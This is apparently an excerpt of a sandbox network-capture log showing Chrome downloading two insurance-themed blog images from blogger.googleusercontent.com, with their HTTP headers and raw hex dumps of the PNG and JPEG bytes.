                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                                                                                                          ETag: "v2a8"
                                                                                                                                                                                                                                                                                                                                                                          Expires: Tue, 15 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="Best Auto Insurance.png"
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 14864
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC911INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 fa 08 02 00 00 00 94 0f ed a4 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 7c 14 d5 f9 ff 9f e7 cc ec e6 b2 09 49 b8 24 10 ee 17 e5 26 05 51 7f d0 56 84 2f 54 01 45 d1 2f 08 b5 68 4b 15 ad 28 a2 b5 a0 6d 55 a8 ad 50 45 fc 5a a3 82 08 b5 2a 16 2a 15 10 a2 04 94 20 08 88 48 40 c3 55 30 24 24 11 72 21 64 93 90 cd 5e e7 3c bf 3f ce ee 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR,sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx{|I$&QV/TE/hK(mUPEZ** H@U0$$r!d^<?d
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 6e b7 fb 7c be 66 a8 a2 a9 84 97 25 04 80 ff fc e7 3f 44 54 52 52 d2 90 cc 23 46 8c 68 4d 57 7b df be 7d db dc f8 84 70 71 e5 e5 e5 99 58 07 8b c5 12 1f 1f ff 43 f2 5b ad 56 b7 db 3d 7c f8 f0 a0 9c f1 f1 f1 c2 b3 d0 a6 09 bb 71 42 b7 db dd f0 cc c5 c5 c5 62 a3 b0 b0 f0 c2 85 0b 56 ab 55 d3 34 9b cd d6 bd 7b f7 d0 cc 17 2e 5c 28 2b 2b 73 b9 5c 8c b1 6e dd ba c5 c6 c6 ea 1f 71 ce cb cb cb 63 63 63 2b 2b 2b ab aa aa ec 76 7b 42 42 42 55 55 55 d7 ae 5d a3 a2 a2 f4 6c fa 4f 17 22 8a 94 ec ec ec 75 eb d6 cd 9f 3f bf 9e 47 c1 e1 70 68 9a d6 ae 5d 3b bd 10 a7 d3 69 b1 58 42 f5 7c ee dc 39 b1 e1 f1 78 ac 56 6b 52 52 92 b1 d8 f2 f2 72 87 c3 d1 b1 63 47 63 a3 ce e9 74 da ed f6 a0 44 9d aa aa aa f3 e7 cf 03 80 f1 a7 ea e2 c5 8b c6 6b 2f 2d 2d 75 38 1c e2 44 55 55 55
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: n|f%?DTRR#FhMW{}pqXC[V=|qBbVU4{.\(++s\nqccc+++v{BBBUUU]lO"u?Gph];iXB|9xVkRRrcGctDk/--u8DUUU
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: e8 bb 9b 36 6d 1a 3c 78 f0 ce 9d 3b 1f 7c f0 c1 55 ab 56 5d d2 db e1 f1 78 12 12 12 a6 4c 99 62 4c 3c 72 e4 08 63 4c 3c 9d 44 b4 78 f1 e2 c8 c8 c8 f4 f4 f4 d0 c3 d7 af 5f 0f 00 4b 97 2e 15 bb 37 de 78 63 7c 7c 7c 50 9e 47 1e 79 24 36 36 b6 1e b7 c7 da b5 6b ad 56 6b 90 13 ff ec d9 b3 5d bb 76 1d 3f 7e 7c ad 87 5c 73 cd 35 16 8b 45 6c ef d9 b3 47 55 d5 f7 df 7f bf be eb 24 22 a2 07 1f 7c 30 2a 2a 2a 3b 3b 5b ec 7e fa e9 a7 23 46 8c 10 db 59 59 59 51 51 51 ab 56 ad d2 33 df 72 cb 2d 56 ab 75 e0 c0 81 bd 02 0c 1a 34 48 f7 bb 84 e6 ff fb df ff ae 28 ca f1 e3 c7 83 4e 3a 67 ce 1c e3 03 f0 f0 c3 0f df 7d f7 dd 41 79 5e 7f fd f5 51 a3 46 e9 5f d6 4f 7f fa 53 45 51 0e 1f 3e 2c 76 dd 6e f7 e9 d3 a7 93 93 93 ef ba eb 2e b3 7c 3c 61 d7 1c ad ac ac e4 9c 9f 3b 77 ae
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 6m<x;|UV]xLbL<rcL<Dx_K.7xc|||PGy$66kVk]v?~|\s5ElGU$"|0***;;[~#FYYYQQQV3r-Vu4H(N:g}Ay^QF_OSEQ>,vn.|<a;w
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 7b 2d 00 14 16 16 6e d9 b2 65 c8 90 21 46 73 e4 74 3a d7 ac 59 73 cd 35 d7 0c 1b 36 4c 2f 39 32 32 72 c6 8c 19 fa e9 f6 ef df bf 63 c7 8e a3 47 8f de 7c f3 cd c2 47 62 a4 aa aa 6a d3 a6 4d 59 59 59 36 9b 2d 2a 2a 6a f2 e4 c9 c9 c9 c9 a7 4e 9d ea df bf ff 82 05 0b 9e 7d f6 59 91 8d 88 3e fd f4 d3 03 07 0e 18 83 d1 19 63 b7 de 7a ab b1 34 b7 db bd 6f df be 6f bf fd b6 4b 97 2e 4e a7 53 51 94 eb af bf de 6a b5 66 64 64 0c 18 30 a0 67 cf 9e b5 de a2 8d 1b 37 66 67 67 4f 9f 3e bd 5b b7 6e 41 1f 1d 3e 7c 78 df be 7d 56 ab 55 b7 d5 4e a7 f3 86 1b 6e 30 36 2b f6 ef df 9f 9d 9d 7d c3 0d 37 74 ed da b5 be 6f 22 40 6e 6e ee e6 cd 9b a7 4f 9f 6e 74 e1 ee db b7 ef cc 99 33 b7 df 7e bb ae ab c3 87 0f 7f f2 c9 27 62 a4 c1 e9 74 76 ea d4 69 dc b8 71 f5 e4 2f 2d 2d 5d bb
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {-ne!Fst:Ys56L/922rcG|GbjMYYY6-**jN}Y>cz4ooK.NSQjfdd0g7fggO>[nA>|x}VUNn06+}7to"@nnOnt3~'btviq/--]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 98 31 a3 6b d7 ae 75 9d 62 fb f6 ed 09 09 09 f9 f9 f9 a1 1f ad 59 b3 46 ff 6d 7d ef bd f7 00 40 2f 79 d9 b2 65 11 11 11 b5 be b9 41 bc b2 e2 c5 17 5f 24 22 b1 1c e0 fc f9 f3 39 e7 e2 d3 ca ca ca 17 5e 78 21 2a 2a 6a cb 96 2d 97 ba 7a 49 a3 91 cd d1 e6 87 88 22 22 22 c8 10 0f 58 5a 5a 6a 5c 83 23 31 31 d1 38 f5 fb e4 c9 93 57 5c 71 45 d0 5a 4f 67 ce 9c 39 7b f6 6c 7e 7e 7e 5d e1 a6 76 bb 3d 2b 2b 2b 68 be 7c 45 45 c5 ac 59 b3 ee b8 e3 0e b1 2b 96 ea d1 fb 7b ff f8 c7 3f 3a 77 ee 3c 79 f2 e4 d0 d2 84 f3 46 ac 0a 91 94 94 74 f3 cd 37 bf fd f6 db d9 d9 d9 13 27 4e 3c 7f fe fc f6 ed db 5d 2e d7 96 2d 5b c6 8c 19 d3 f0 fb 20 69 20 d2 3b da fc 08 9f 87 71 b1 b0 ce 9d 3b 1b e3 83 0f 1d 3a 64 b7 db f5 dd d4 d4 54 63 00 da d9 b3 67 7f ff fb df 9f 3d 7b 16 02 ee cd
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1kubYFm}@/yeA_$"9^x!**j-zI"""XZZj\#118W\qEZOg9{l~~~]v=+++h|EEY+{?:w<yFt7'N<].-[ i ;q;:dTcg={
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 44 04 a4 00 00 67 1a 11 89 74 0e 8c 88 18 55 eb 47 03 42 44 f0 79 19 63 84 c0 18 b3 44 45 76 ec 9e dc ef ff 0d 83 d1 d7 60 cf 78 b0 01 59 02 86 32 f8 bc d2 06 4a 1a 47 d8 2d f4 e4 17 15 fa b7 15 60 c4 79 79 e1 f9 ad af fe ab f0 ab a3 91 25 9e 78 0f 8b b6 a8 56 54 88 10 02 1a d0 95 60 e8 9b e9 09 c4 48 5c a6 5f 84 44 54 ab 08 75 38 02 11 59 10 38 e7 c0 90 73 ee 03 72 33 aa 40 af bb 6b 5c af 71 d7 dd 30 e3 8e f8 5e 5d 00 00 01 44 3b 59 1a 40 49 93 09 47 11 0a fb 86 88 e0 01 28 76 6a 6b 76 ec fc ef 66 57 d9 45 ab d5 6a b1 a0 a2 28 1a 6a 8c 31 dd 0c 32 c6 34 d0 00 80 11 03 00 8e 0c 00 90 6b 00 a0 01 12 11 72 22 22 24 46 44 c4 45 7b b2 a6 db 93 08 38 22 a2 68 ca 0a 79 2b 1c 00 80 18 02 00 72 e2 9c 13 43 4d d3 bc 2e 77 5c 5c dc 75 53 6f 8a bd 6b 22 f4 8f 01 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: DgtUGBDycDEv`xY2JG-`yy%xVT`H\_DTu8Y8sr3@k\q0^]D;Y@IG(vjkvfWEj(j124kr""$FDE{8"hy+rCM.w\\uSok"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: ea 30 70 e0 2f ef bd 37 26 26 c6 e3 f1 88 d2 82 44 55 ab 1b 30 48 6f c6 dd a0 27 c9 68 63 bd 5e 2f 34 b8 87 f9 63 43 de 96 7a 08 23 11 1a 65 06 00 8c 31 45 65 8c a9 8a 62 51 55 2b 30 06 8c 31 e6 ff df 20 4b 0e c0 b9 82 88 a8 02 2a e4 f3 b4 8b 80 48 c5 ef 47 b1 a9 da e8 21 bd df fc 93 7d c2 4f ca bc 0e 50 35 60 a8 20 22 70 86 84 c4 91 98 86 04 0a d3 5b 9e a1 83 f8 a1 01 3d 41 54 07 df 48 24 8d 27 8c 44 a8 a3 ff 6a ea 0e 4c fd d1 0f 75 66 1a cd 63 f5 46 cd 81 66 6b 7c fc 84 7b ef bd f6 da 6b 9d 4e a7 b1 9d 29 ca 07 a3 6f 36 a4 0e 50 c7 af 78 68 35 ea 51 a9 44 52 0f e1 22 c2 a0 67 17 91 10 01 91 84 a1 43 24 a6 00 53 6a b8 55 18 f8 c3 d7 18 63 48 c0 11 48 61 1a 02 d3 48 8f 89 45 00 06 48 2a 42 27 5b fc e2 07 3c bf 1e 5b 0e 1e 2f 23 2f 72 4e 48 08 1c 48 65 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0p/7&&DU0Ho'hc^/4cCz#e1EebQU+01 K*HG!}OP5` "p[=ATH$'DjLufcFfk|{kN)o6Pxh5QDR"gC$SjUcHHaHEH*B'[<[/#/rNHHe
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: a6 dd 1c e3 81 c6 c2 8d db c6 3c c6 e7 cc 58 81 a0 5d 63 9d 9b 05 fd 97 c8 36 ae 67 f7 b5 93 6d e3 7a 76 9c 3f a2 e3 3c 7f 2b b4 b1 9a 6f ec 55 37 ed 10 53 08 53 11 0a c8 80 b0 78 ba b9 d3 02 f8 7c 3e ad 26 7a 4c 4c 68 69 28 86 37 c0 3f 68 e1 ef 76 72 9e dc bd fb af 9f 7e fa da 6b af 75 b9 5c 41 eb 88 1a 87 22 8d 26 b1 d6 8e 62 f8 a3 1b a2 5a 77 9b 17 5d d5 31 63 7b e9 89 a2 51 20 31 12 a6 7d 42 ce 7d 40 56 ae 11 47 e2 62 b6 84 46 44 c4 b8 c6 11 09 19 22 02 23 00 a0 80 99 22 22 d0 08 bc 0c 34 2e de 1f 01 41 93 37 84 ed aa e1 6e 41 22 02 31 de f8 93 b8 01 ab e7 97 be bc e6 ab d5 a9 03 2f 46 32 c6 34 51 13 04 aa db 17 4a 8d 0f 91 69 72 17 ab 85 68 b9 fa 28 09 91 42 87 46 6b a3 77 c6 9a 51 8d 66 8d 58 36 17 61 2b 42 4e 44 c4 85 01 04 d0 63 51 c4 7b 26 90 10
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <X]c6gmzv?<+oU7SSx|>&zLLhi(7?hvr~ku\A"&bZw]1c{Q 1}B}@VGbFD"#""4.A7nA"1/F24QJirh(BFkwQfX6a+BNDcQ{&
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 56 2b 43 45 3f 9d 7e 78 ad 0e 18 0a 44 a0 42 6d f3 36 ea c2 38 56 7e b9 46 8d 38 d2 73 f5 86 68 c7 f9 23 84 27 26 79 d9 78 c7 0e 7f 7a c9 d2 fd ed a6 f6 3f f7 d0 36 7d 37 61 d6 d0 1f ad c3 26 4c 45 a8 3f df a4 2f 4e e1 1f c4 47 22 62 fe 88 35 f1 66 5c 91 ee 3f 8c 73 62 81 e0 6c 51 94 2e 45 e6 1f ef e3 04 80 80 cc 6f e6 00 f2 5c c7 e6 bd 0c fb 8f 5c 11 13 ef 45 4e 58 43 f9 0c 30 30 93 bf b6 b0 18 6c f4 ba f7 67 26 be af 6f b7 4e d0 63 d3 16 b0 f9 21 18 8d aa 6e 00 95 84 c8 e4 65 e3 f3 ef da 04 00 9a dd 95 3d f2 5d 5d a8 2d 34 40 d2 56 08 bf e6 68 6d cb 9c e9 01 34 7a f0 8a 71 86 a1 71 26 61 d0 40 42 cd 82 fd b3 28 fc fb 88 00 e0 ac ac fc f0 c5 17 4f 9c 38 11 13 13 63 8c 8c 09 ea f2 19 83 63 82 11 13 33 00 1a 6e 0c c3 93 16 92 81 b1 58 63 a3 54 57 a0 3e d3
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: V+CE?~xDBm68V~F8sh#'&yxz?6}7a&LE?/NG"b5f\?sblQ.Eo\\ENXC00lg&oNc!ne=]]-4@Vhm4zqq&a@B(O8cc3nXcTW>
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 00 ff 5b 11 c5 87 22 9e 86 13 00 80 37 42 01 84 a6 3d 9d fa fd 10 55 68 d4 31 c6 96 79 3d 19 2e 79 ec 25 cb 31 1e 15 da 98 af 95 50 f1 84 2a 4a 7f 06 42 53 ea 2a e4 92 e7 6d 5b 98 2c 42 fd 3e 56 cf 55 8f 8d b5 58 2c e4 0e be c5 b5 7e e5 46 9d 88 74 8b c5 92 9b 9b 0b e7 0a 20 a1 33 63 ec c2 99 9c d5 7f 7e 2e f9 c8 c5 58 9b cd 9f 07 6b b8 3a 83 ec 6a 50 ba be 6d 74 87 06 3a a5 fe bc 9c 48 45 a6 a8 6a 42 fb f6 10 f2 5b de c8 07 25 dc 9f aa d0 9f aa fa 2f 30 48 d8 b5 aa fd 92 65 d6 7a 8a cb 46 81 60 ba 08 05 35 1c 2d dd db 3b 93 db c5 1f b7 2b aa ca 45 ab 92 71 4e 5c 01 66 7c a6 83 7e 1d 39 53 34 4d 53 81 18 63 5d 72 9d 19 73 5f 1e 3a 61 8c c3 e1 38 9a fa 59 df 0b 55 91 91 b6 80 ef 84 7c c4 d1 f0 96 ec ba da b7 02 63 4b 58 b8 41 19 43 ce 03 93 15 d1 ef 79 f5
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ["7B=Uh1y=.y%1P*JBS*m[,B>VUX,~Ft 3c~.Xk:jPmt:HEjB[%/0HezF`5-;+EqN\f|~9S4MSc]rs_:a8YU|cKXACy


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          26192.168.2.749744172.217.16.1294432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC685OUTGET /img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxc-hwTYbS3a1TQOLU60Y3imqy1yV2Ra0mLvkxr0mtirFQzRdl8HUIFGwZeHbN-1ZYAFW0XPgAB4Joue2DmmjAJHamVEq0bhi80fVeW8ke7prIDNkNsCHk_8H_jfvg2VB1AGMJndzaxuFOSC_HidiCg3/s1600/motor%20insurance%20quote.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: blogger.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC482INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                                                                                                          ETag: "v472"
                                                                                                                                                                                                                                                                                                                                                                          Expires: Tue, 15 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="motor insurance quote.jpg"
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 29882
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC908INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 78 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 04 00 12 01 03 00 01 00 00 00 01 00 00 00 31 01 02 00 07 00 00 00 3e 00 00 00 12 02 03 00 02 00 00 00 02 00 02 00 69 87 04 00 01 00 00 00 46 00 00 00 00 00 00 00 47 6f 6f 67 6c 65 00 00 03 00 00 90 07 00 04 00 00 00 30 32 32 30 02 a0 04 00 01 00 00 00 40 01 00 00 03 a0 04 00 01 00 00 00 40 01 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: JFIF``xExifII*1>iFGoogle0220@@CC
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: db ef 5f 59 ff 00 10 bf 23 ed 3f fc 0b fe 01 f3 3f f1 10 33 7e f1 ff 00 c0 4f d2 51 ff 00 05 9f f8 73 ff 00 42 df 8d 3d 3f d5 43 ff 00 c7 68 ff 00 87 cf fc 39 1f f3 2d f8 d3 fe fd 43 ff 00 c7 6b f3 6b 6f bd 1b 7d e9 ff 00 c4 2f c8 fb 4f ff 00 02 ff 00 80 1f f1 10 33 7e f1 ff 00 c0 7f e0 9f a4 bf f0 f9 ff 00 87 24 7f c8 b7 e3 4f 4f f5 50 ff 00 f1 da 5f f8 7d 07 c3 a0 73 ff 00 08 df 8d 3f ef d4 1f fc 76 bf 36 76 fb d1 b7 de 97 fc 42 fc 8f b4 ff 00 f0 2f f8 01 ff 00 11 03 37 ef 1f fc 04 fd 25 1f f0 59 ff 00 87 3f f4 2d f8 d3 d3 fd 54 3f fc 76 8f f8 7c ff 00 c3 91 ff 00 32 df 8d 3f ef d4 3f fc 76 bf 36 b6 fb d1 b7 de 9f fc 42 fc 8f b4 ff 00 f0 2f f8 01 ff 00 11 03 37 ef 1f fc 07 fe 09 fa 4b ff 00 0f 9f f8 72 47 fc 8b 7e 34 f4 ff 00 55 0f ff 00 1d a5 ff 00 87
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: _Y#??3~OQsB=?Ch9-Ckko}/O3~$OOP_}s?v6vB/7%Y?-T?v|2??v6B/7KrG~4U
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: dd 8a 7d fe c0 0e 49 f6 f7 f4 1e b5 f4 d6 99 fb 26 f8 5f e3 26 a3 fd 8b e0 78 7e cb f6 17 81 35 2d 5e 4d 41 e4 d4 34 ac 59 3c f7 10 ea 7a 7d c1 8f c9 95 dc 0f 21 c6 23 c7 cc 5b 0a 6b ea f3 5c ef 0f 97 f2 bc 45 ed 2b eb a5 95 b7 be be 7a 25 76 fa 1f 39 80 cb 6b 63 39 95 1d d5 b4 ef 73 e6 9d d4 9b 87 ad 7b ff 00 85 3f 63 fd 0f c7 de 04 82 eb 47 f1 46 9b 7d 67 75 79 0e aa 35 b8 6f ad 6e 0a 69 72 69 6f 7a 60 78 d2 66 b6 37 08 e1 41 61 2e c2 08 60 76 f2 72 f5 ff 00 d9 6b c2 9e 04 9f 43 97 55 f8 80 b7 36 7e 28 b8 91 b4 63 a4 d9 a5 fc 77 91 46 b1 bb ac c6 09 ca 23 61 8a 93 19 60 b8 dc 4e 2b cc a7 c6 59 64 df 2c 66 db e8 ac ee ff 00 0f f8 3d ec 77 4f 86 f1 b1 f8 92 b7 7b a3 c5 37 0a 5d d5 ec 7e 29 fd 9f 7c 3f a9 fe d6 5e 36 f0 7e 8f 75 aa 58 f8 7f c3 61 ee 03 98
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }I&_&x~5-^MA4Y<z}!#[k\E+z%v9kc9s{?cGF}guy5onirioz`xf7Aa.`vrkCU6~(cwF#a`N+Yd,f=wO{7]~)|?^6~uXa
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 90 e5 48 20 81 5a 9e 21 fd 91 3e 27 78 5b c5 fa 1f 87 ef bc 17 a9 43 ad f8 92 17 9f 4e b3 59 e0 96 59 55 0e 24 2d e5 c8 c2 30 bc 1c b1 1d 7b 53 be 2c 7e c8 1f 13 be 07 78 65 b5 af 15 f8 42 eb 47 d2 54 61 ae da ee de e2 18 4e 0f fa d6 86 49 04 6b 9c 0d ed c6 48 af 4e 15 b2 39 54 82 84 a9 b9 3b 28 d9 c6 ef 97 65 1f 47 b5 b6 b1 e7 4a 86 66 a9 ce f1 9a 4b 7d 1d b5 de fe a9 99 9a 6f ed 17 e3 bd 23 40 d2 34 cb 5f 14 5e 5b da e8 7b 16 c9 96 da 0f b4 45 1c 4e 5e 18 5e 6f 2f cc 9a 35 24 fc b2 b3 2f 00 e3 20 11 d2 ea 3f b6 bf c4 5b 9b eb 0b fb 1d 73 fb 37 50 b5 b2 b7 b4 b8 9a 2b 1b 79 16 f0 c0 ee d1 cc 62 68 cc 71 c8 3c c6 19 40 38 aa bf 0c 7f 62 ef 8a 7f 1a 3c 31 1e b9 e1 9f 06 ea 17 da 35 c3 95 86 e6 e2 78 2c 7c f0 00 f9 d5 66 75 dc 84 9c 06 04 e7 19 c6 2b d1 3f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: H Z!>'x[CNYYU$-0{S,~xeBGTaNIkHN9T;(eGJfK}o#@4_^[{EN^^o/5$/ ?[s7P+ybhq<@8b<15x,|fu+?
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 66 89 2d ff 00 76 2f 23 44 12 a4 60 2b 4a a0 91 b8 01 c1 e9 54 ff 00 62 24 d7 67 fd ae fe 3b 2f 88 97 53 93 6d cd a7 d8 05 fe e3 fe 8d be 52 9e 5e ee b1 82 38 c7 19 af 83 f4 8f da bb e2 0e 89 f1 9d be 20 27 88 ee 26 f1 74 b1 7d 9d ae a6 81 65 8e 48 7f e7 8e cc 6d db d3 81 cf 15 d8 5b ff 00 c1 48 fe 2e 5b 78 de f3 c4 51 6b 5a 4a ea 97 d6 b1 69 f3 16 d1 e0 d8 62 46 76 8c 05 0d d9 9d b2 49 ce 0f b5 7c 66 3b 81 73 39 c2 70 82 a6 f9 e9 42 2d fc 36 94 5a 6e ca dd 6c 7d 36 17 8a f0 11 9c 65 27 35 cb 52 52 5d 6e a4 9d b5 bf 43 ea 2f f8 26 d7 c7 1d 73 e3 d7 c5 7f 88 93 78 bb 57 6d 57 58 d0 8f d9 34 b5 30 c7 1b 5b 5a b4 8f b8 47 80 0e 4e 06 4f b0 ab 3f 14 7e 33 78 7f c1 9f b3 3f c6 cd 27 52 5f 8c de 2a b2 fe c9 d4 cd ec de 24 d1 9e 78 ac c3 c0 ea 16 27 11 a0 f2 54
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: f-v/#D`+JTb$g;/SmR^8 '&t}eHm[H.[xQkZJibFvI|f;s9pB-6Znl}6e'5RR]nC/&sxWmWX40[ZGNO?~3x?'R_*$x'T
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 7d 13 6e cd 34 d3 d3 6b 5a c7 2e 23 8b 30 35 15 68 fb d6 93 6d 2b 5b 56 92 bd d3 bf ae e7 89 c2 fe 65 ba b0 dc 37 28 24 30 da 73 df 8a b4 3a 54 2a 9e 5a 6d 5f ba bc 0a 90 38 c7 5a fd aa 3b 1f 97 3d c7 51 40 6c d1 54 20 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 01 91 ff 00 c7 ca fd 45 7e aa fe c5 5f f2 8c 0f 08 ff 00 d8 9d 3f fe 81 2d 7e 55 47 ff 00 1f 2b f5 15 fa ab fb 14 f1 ff 00 04 bf f0 8f fd 89 b3 ff 00 e8 12 d7 e4 de 2e 7f c8 ba 87 f8 ff 00 f6 d6 7e 8f e1 9f fb f5 5f f0 7f ed c8 e0 ff 00 e0 b6 7f f2 43 3c 1b ff 00 63 40 ff 00 d2 59 eb f3 9d 3a 57 e8 c7 fc 16 cf fe 48 67 83 7f ec 68 1f fa 4b 3d 7e 73 a7 4a f5 fc 31 ff 00 91 14 7f c5 3f cd 1e 5f 1f ff 00 c8 e2 5f e1 8f e4 47 a8 ca 61 b0 99 86 dc aa 12
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }n4kZ.#05hm+[Ve7($0s:T*Zm_8Z;=Q@lT ((((((((E~_?-~UG+.~_C<c@Y:WHghK=~sJ1?__Ga
